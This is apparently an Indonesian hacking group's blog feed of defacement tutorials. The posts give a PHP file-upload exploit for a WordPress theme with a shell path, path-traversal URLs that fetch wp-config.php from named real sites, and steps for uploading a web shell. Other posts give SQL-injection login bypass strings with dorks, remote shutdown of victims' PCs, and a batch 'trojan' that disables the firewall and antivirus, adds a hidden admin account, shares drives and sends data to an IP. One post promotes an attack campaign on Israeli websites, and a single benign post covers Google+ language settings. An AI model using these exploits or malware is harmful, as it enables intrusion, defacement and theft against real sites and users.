United Indonesian Hackers

Deface Dengan WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability

noreply@blogger.com (Hollownesia) — Sat, 14 Feb 2015 13:14:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Deface Dengan WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability. Halo Mblo, ketemu lagi sama ane yang tamvan dan berani ^_^ , kali ini ane mau share tentang cara
Deface Dengan WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability. Langsung aja ya mbloo biar gak kelamaan jomvloo ^_^ .

.__.__                   __               __                         
 __ __  ____ |__|  |__ _____    ____ |  | __         _/  |_  ____ _____    _____  
|  |  \/    \|  |  |  \\__  \ _/ ___\|  |/ /  ______ \   __\/ __ \\__  \  /     \ 
|  |  /   |  \  |   Y  \/ __ \\  \___|    <  /_____/  |  | \  ___/ / __ \|  Y Y  \
|____/|___|  /__|___|  (____  /\___  >__|_ \          |__|  \___  >____  /__|_|  /
           \/        \/     \/     \/     \/                    \/     \/      \/ .Blogspot.com

Google Dor ... dorr... dorrrk : inurl:/wp-content/themes/switchblade

Exploit jeung POC :
<?php
$uploadfile="up.php";
$ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access :
http://joomvlo.com/[path]]/wp-content/uploads/[tahon]/[bolan]/shell.php

Udah gitu aja, kalo gak ngerti tanya aja ke fb ane link : www.fb.com/Aria.phtml

Notes : Semua kerusakan yang terjadi bukanlah tanggung jawab penulis, karena penulis hanya memberi pembelajaran yang bukan untuk disalah gunakan !

#OpIsrael Telah Kembali

noreply@blogger.com (Hollownesia) — Sat, 14 Feb 2015 10:33:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — #OpIsrael Telah Kembali. Operasi Penyerangan Situs Web Israel (#OpIsrael) telah diadakan kembali oleh kelompok Hacker yang bernama United Indonesian Hackers untuk mengecam semua tindakan Militer Israel terhadap orang Islam.

Operasi ini mendapatkan dukungan dari Anonymous, Pak Cyber Attackers, Muslims Hackers, dan lain-lain. Operasi ini akan dimulai dari 7 April sampai 7 Mei 2015. Operasi ini mungkin akan diadakan setiap tahun sampai pihak Israel berhenti menyerang orang Islam atau pun menghina Islam, khususnya di Palestina.

Operasi penyerangan ini akan dilakukan secara besar-besaran oeh Hacker diseluruh dunia yang dapat mengancam situs-situs web Israel. Bukan hanya untuk menyerang situs web Israel, operasi ini juga mempunyai tujuan untuk menghapus Israel dari dunia maya.

Tapi kita belum tahu apa yang akan dilakukan oleh pemerintah Israel, jika penyerangan ini sudah dilaksanakan.
Berikut adalah link acara #OpIsrael : https://www.facebook.com/events/430879920394840/

Deface Dengan Wordpress Video Gallery Arbitrary File Download Vulnerability

noreply@blogger.com (Hollownesia) — Sun, 01 Feb 2015 06:02:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Deface Dengan Wordpress Video Gallery Arbitrary File Download Vulnerability. Halo Coeg kali ini ane mau bagi Cara Deface Dengan Wordpress Video Gallery Arbitrary File Download Vulnerability, Langsung aje ye coeg daripade banyak cingcong :v .

Gugel Dork :
Use your brain ;) hanya anak kecil yang selalu ngemis dork, cobalah untuk berpikir menggunakan otak anda, agar anda bisa menjadi serang Master Dorking ;) .

Exploit :
http://target.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

Demo :
http://www.gerardbattenmep.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
http://kleenradio.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

Thanks To : Mr.Crazyxx and United Indonesian Hackers

Deface Dengan WordPress-Easy-Comment Exploit

noreply@blogger.com (Hollownesia) — Tue, 20 Jan 2015 14:28:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Deface Dengan WordPress-Easy-Comment Exploit Halo coeg kali ini ane mau bageh imu tentang cara Deface Dengan WordPress-Easy-Comment Exploit. Wokeh laangsung aje ye mbloo :v .

Google Dork :
inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
intext:Index of /wp-content/plugins/easy-comment-uploads

Exploit :
/upload-form.php

1. Cari dulu target pakek dork di atas, pilih yang mana aje.
2. Kalo udah ketemu nanti bakal muncul form upload, nah tinggal upload deh shell ente.
3. Kalo berhasil tinggal eksekusi shelnya di www.target-ente.com/wp-content/uploads/2015/01/shell-ente.php
4. Kalo shell ente kagak muncul berarti udah di patch atau ente kurang TAMVAN, xixixi.

NOTES : Segala kerusakan yang terjadi adalah tanggung jawab ente sendiri,penuis tidak bertanggung jawab karena penulis hanya berbagi ilmu yang bukan untuk disalah gunakan.

Cara Mematikan Komputer Orang Lain Melalui CMD

noreply@blogger.com (Hollownesia) — Mon, 19 Jan 2015 13:30:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Cara Mematikan Komputer Orang Lain Melalui CMD. Halo coeg kali ini si TAMVAN dan BERANEH mau bagi ilmu tentang Cara Mematikan Komputer Orang Lain Melalui CMD. Gimana udah gak sabar kan langsong ajo lah dari pada ente semua nunggu kelamaan Mbloo.

1. Komputer / Laptop ente harus terhubung dengan internet.
2. Buka Baju, eh maksudnya buka Command Prompt / CMD, caranye tekan + R yang ada di keyboard ente.
3. Ntar keuar RUN terus ente ketik CMD.
4. Entar keluar kotak hitam atau CMDnya.
5. Ketik shutdown -i pada kotak CMD kemudian tekan Enter.
6. Setelah itu muncul deh kotak Remote Shutdown Dialog.
7. Ada tiga pilihan disana Logoff, Shutdown, dan Restart.
8. Lalu Klik add dan masukkan IP Korban yang mau dijahii, xixixi.
9. Jika sudah,tinggal masukkan alasan kenapa ente melakukan hal itu, kalo ane sih jawabnye karena dia kurang TAMVAN. xixixi.
10. Jika semua sudah selesai klik OK, tinggal tunggu aja sesuai waktu yang ditentukan dan pasti Komputer si korban bakal nyutdown sendiri, xixixixi, Tapi inget Komputer si Korban juga harus sedang terhubung dengan Internet.

Haha gimana simple kan, mangkanya terus tunggu artikel terbaru dari si TAMVAN dan BERANEH, xixixi.

NOTES : Segala kerusakan yang terjadi adalah tanggung jawab Ente sendiri, penulis tidak bertanggung jawab karena penulis hanya berbagi ilmu yang bukan untuk disalah gunakan, dan ingat DOSA tanggung sendereh.

Deface Dengan Bypass Admin SQL Login

noreply@blogger.com (Hollownesia) — Mon, 19 Jan 2015 09:31:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Deface Dengan Bypass Admin SQL Login Oke coeg kali ini ane mau share tentang cara Deface Dengan Bypass Admin SQL Login. Langsung aja ye coeg biar gak pegel ngetik :v .

Gugel Dork :

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurl:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Ente bisa kembangin dorknye :v .

Nah kalo udah dapet target langsung aja login pake :
User : ' or 1=1 limit 1 -- -+
Pass : ' or 1=1 limit 1 -- -+

Kalo vuln pasti langsung bisa login coeg, tapi tidak semua website vuln dengan method ini, jadi ente harus terus coba, coba, dan terus mencoba agar berhasil karena Heykeulz yang selalu berhasil adalah Heykeulz yang selalu berusaha dan mencoba. Maaf alay dikit :v .
Gampang kan Mbloo, oh ya ane cari di Gugel sih katanya method ini juga bisa dipakai untuk cari Credit Card. Tapi kalo ente masih belum dapet target yang vuln walaupun ente telah berusaha dan mencoba selama 100 tahun berarti ente kurang TAMVAN.

NOTES : Segala kerusakan yang terjadi bukanlah tanggung jawab penulis, karena penulis hanya memberi pembelajaran yang bukan untuk disalah gunakan, dan ingat DOSA tanggung sendiri ya Mbloo.

Cara Mudah Membuat Virus Trojan Dengan Notepad

noreply@blogger.com (Hollownesia) — Sun, 18 Jan 2015 14:16:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Cara Mudah Membuat Virus Trojan Dengan Notepad Halo, ketemu lage sama ane yang TAMVAN, xixixi. Langsung aja ye dari fada banyak cingchong :v .

1. Buka Notepad
2. Copy + Paste Kode di bawah ini :

@echo off
color 0a
cls
IF not exist %windir%\%0 copy %0 %windir%
netsh firewall set opmode=disable
net stop ShareAccess
Net stop “Security Center”
Tskill *AV*
NET USER admin admin123 /ADD
NET LOCAL GROUP ADMINISTRATORS admin /ADD
Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f
Net start messenger
dir *.*>>Filelist.txt
Net send 192.168.1.100 >hasil.txt
NET SHARE system=%SYSTEMDRIVE% /UNLIMITED
NET SHARE data1=D:\ /UNLIMITED
NET SHARE data1=E:\ /UNLIMITED
REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f
Net start tIntsvr
REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f

3. terus ente Save as dengan all type terus ente kasih nama dengan ekstensi .bat contoh » Trojan.bat

EFEK DARI VIRUS GANAS INI LUMAYAN BERBAHAYA NEH LIHAT DI BAWAH :- penyebaran seperti worm jadi mudah berkembang biak

- disable firewall

- stop ShareAccess

- stop Security Center

- nge kill AV

- membuat user dengan nama admin123

- pertahanan pada user admin123

- menjalankan messenger

- mengirim kan hasil rekaman ke ip 192.168.1.100

NOTES: Semua kerusakan yang terjadi adalah tanggung jawab Ente sendiri, Penulis kagak bertanggung jawab karena penulis hanya share tentang pembelajaran yang bukan untuk di salah gunakan !

Cara Mengganti Bahasa Default di Google+

noreply@blogger.com (Hollownesia) — Sun, 18 Jan 2015 09:55:00 +0000

UNIHACK-TEAM.BLOGSPOT.COM — Cara Mengganti Bahasa Default di Google+. Pasti ente pingin ganti bahasa default di Google+ kan tapi gak tau caranya, nah karena itulah ane share tutor ini, langsung aja ye dari pade banyak cingcong :v .

1. Buka dulu Google+ » Klik foto ente yang ada di sudut kanan atas.

2. Klik Akun » Klik Bahasa yang ada di bagian tengah atas.

3. Klik bahasa yang ente gunain saat ini buat ngeliat menu tarik turun opsi bahasa.

NOTES : Cara diatas adalah cara yang dipakai menggunakan PC / Laptop, Kalo Android / Web seluler / iPhone atau iPad sayang sekaleh soalnya kata Mbah Google+ ente belum bisa memperbarui bahasa defeult di seluler. Katanya sih ente harus pakek PC /Laptop.

Oh ye masih ada, berikut adalah bahasa-bahasa yang bisa ente pilih / ganti.
Afrikaans
Amhara
Arab
Basque
Bengali
Bulgaria
Katala
China (China)
China (Hong Kong)
China (Taiwan)
Kroat
Cheska
Dansk
Belanda
Inggris (Inggris Raya)
Esti
Filipino
Finlandia
Prancis
Prancis (Kanada)
Galicia
Jerman
Yunani
Gujarati
Ibrani
Hindi
Hungaria
Islandia
Indonesia
Italia
Jepang
Kannada
Korea
Latvi
Lituavi
Malaysia
Malayalam
Marathi
Norsk
Persia
Polski
Portugis (Brasil)
Portugis (Portugal)
Rumania
Rusia
Serbia
Slovak
Sloven
Spanyol
Spanyol (Amerika Latin)
Swahili
Swensk
Tamil
Telugu
Thai
Turki
Ukraina
Urdu
Vietnam
Zulu